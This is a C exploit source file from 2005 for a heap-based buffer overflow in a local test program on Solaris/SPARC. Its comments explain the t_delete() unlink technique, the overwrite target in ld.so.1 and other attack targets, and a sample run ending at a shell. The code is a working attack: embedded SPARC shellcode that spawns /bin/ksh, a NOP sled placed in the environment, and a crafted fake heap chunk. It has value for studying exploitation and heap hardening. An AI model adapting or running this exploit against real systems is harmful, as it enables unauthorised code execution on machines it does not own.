/*
 * $Id: heap1-ex.c,v 1.1 2005/03/02 21:00:52 raptor Exp $
 *
 * heap1-ex.c - heap1.c exploit (Solaris/SPARC heap-based)
 * Copyright (c) 2005 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit shows the basic heap-based buffer overflow exploitation
 * technique, abusing the function t_delete() of the Solaris System V
 * heap implementation. The special shellcode with the branch ahead of
 * 0x404 bytes (to avoid nulls in the opcode, if null bytes can be included
 * in your shellcode then by all means reduce the branch distance) is stuck 
 * into the envp. The target for overwrite is the thr_jmp_table within 
 * /usr/lib/ld.so.1.
 *
 * Other possible targets for overwrite: saved pc on stack, ti_jmp_table + 4 
 * (mutex_lock), fini() pointer in static_mem (_exithandle), .dtors + 4 (but
 * it contains null bytes).
 *
 * bash-2.03$ pmap 2131 | grep ld.so.1
 * FF3B0000    136K read/exec         /usr/lib/ld.so.1
 * ^^^^^^^^\__(LDSO_BASE)
 * FF3E2000      8K read/write/exec   /usr/lib/ld.so.1
 *
 * bash-2.03$ readelf -a /usr/lib/ld.so.1 | grep thr_jmp_table  
 *    433: 000321b4    28 OBJECT  LOCAL  DEFAULT   14 thr_jmp_table
 *         ^^^^^^^^\__(LDSO_OFFSET)
 *
 * bash-2.03$ uname -a
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 * bash-2.03$ gcc heap1-ex.c -o heap1-ex -Wall
 * bash-2.03$ ./heap1-ex
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.8)
 * Using stack base        : 0xffbefffc
 * Using thr_jmp_table     : 0xff3e21b4
 * Using ret address       : 0xffbefba4
 * 
 * $ 
 *
 * Other possible exploitation scenarios: the bottom chunk (via the t_delete()
 * function), small chunks (either overwriting the size field with a large or
 * negative size to trick the malloc implementation to believe the small chunk
 * is actually a normal chunk, or overwriting the next pointer in the linked
 * list to make malloc() return an arbitrary pointer anywhere in memory and be
 * able to achieve an overwrite of more than four bytes via a heap overflow),
 * double free (very difficult to exploit due to the additional checks done
 * within _free_unlocked(), but still possible), arbitrary free (also via the
 * t_delete() function, taking advantage of the fact that the Solaris heap
 * implementation performs no pointer verification on values passed to free()
 * -- these pointers can be located on the heap, stack, static data, or other
 * memory regions and they will be gladly freed by the heap implementation).
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define	VULN		"./heap1"	// the vulnerable program
#define	BUFSIZE		113		// evil buffer size (64 + 48 + 1)
#define	NOP		0x801c4011	// Solaris/SPARC nop equivalent
#define	FAKE_SIZE	0xfffffff0	// the lower two bits must be 0
#define	FAKE_LEFT	0xffffffff	// -1 for ISNOTREE() to be true
#define	LDSO_BASE	0xff3b0000	// ld.so.1 memory space base
#define	LDSO_OFFSET	0x000321b4	// thr_jmp_table offset in ld.so.1

/* as a side note, NOP may also be 0x90909090 ;) */

/* voodoo macros */
#define VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

char jmp[] = /* branch 0x404 bytes ahead (4 bytes) */
"\x10\x80\x01\x01";

char sc[] = /* Solaris/SPARC shellcode (48 bytes) */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* globals */
char	*arg[256];
int	arg_pos = 0, arg_len = 0;
char	*env[256];
int	env_pos = 0, env_len = 0;

/* prototypes */
int	add_arg(char *string);
int	add_env(char *string);
void	pad_arg(void);
void	set_val(char *buf, int pos, int val);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], ssc[strlen(sc) + strlen(jmp) + 1024 + 1];
	char	platform[256], release[256];
	char	*p;

	int	i, rel, offset, plat_len, prog_len;
	int	ret, retloc = LDSO_BASE + LDSO_OFFSET;

	/* get the stack base */
	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* prepare the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* add the arguments, pad argv and envp[0] */
	add_arg(buf);
	add_arg(NULL);
	pad_arg();

	/* build the special shellcode */
	memset(ssc, 'A', sizeof(ssc));
	ssc[sizeof(ssc) - 1] = 0x0;
	/* nop sled */
	for (i = 0; i < sizeof(ssc); i += 4)
		set_val(ssc, i, NOP);
	/* branch opcode and shellcode */
	memcpy(ssc, jmp, 4);
	memcpy(ssc + 1024 + 4, sc, strlen(sc));

	/* put the shellcode in envp, keeping padding */
	add_env(ssc);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(strrchr(VULN, '/') + 1) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the retaddr in envp[0] */
	ret = sb - offset + arg_len;

	/* build the fake chunk */
	p = buf + 64;
	set_val(p, 0, FAKE_SIZE);
	set_val(p, 8, ret);
	set_val(p, 16, FAKE_LEFT);
	set_val(p, 32, retloc - 8);

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
	fprintf(stderr, "Using thr_jmp_table\t: 0x%p\n", (void *)retloc);
	fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
	exit(0);
}

/*
 * add_arg(): add an argument to argv
 */
int add_arg(char * string)
{       
	/* null termination */
	if (!string) {
		arg[arg_pos] = NULL;
		return(arg_len);
	}

	/* take care of argv[0] padding */
	if (!arg_pos) {
		arg[arg_pos] = "AAA";
		arg_len += 4;
		arg_pos++;
	}

	/* actually add the argument to argv */
	arg[arg_pos] = string;
	arg_len += strlen(string) + 1;
	arg_pos++;

	return(arg_len);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
	int	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}

	return(env_len);
}

/*
 * pad_arg(): pad argv using argv[0] and get a padded envp[0] too
 */
void pad_arg()
{
	int	pad;
	char	*arg0;

	/* already padded? */
	if (!(arg_len % 4))
		return;

	/* malloc() the right amount of space for padding */
	pad = 4 - (arg_len % 4);
	arg0 = (char *)malloc(pad + strlen(arg[0]) + 1);

	/* write the padding and terminate argv[0] */
	memset(arg0, 'A', (pad + strlen(arg[0]) + 1));
	arg0[(pad + strlen(arg[0]) + 1) - 1] = 0x0;

	/* use the new argv[0] */
	arg_len = arg_len - (strlen(arg[0]) + 1) + strlen(arg0) + 1;
	arg[0] = arg0;

	return;
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
        buf[pos] =      (val & 0xff000000) >> 24;
        buf[pos + 1] =  (val & 0x00ff0000) >> 16;
        buf[pos + 2] =  (val & 0x0000ff00) >> 8;
        buf[pos + 3] =  (val & 0x000000ff);
}
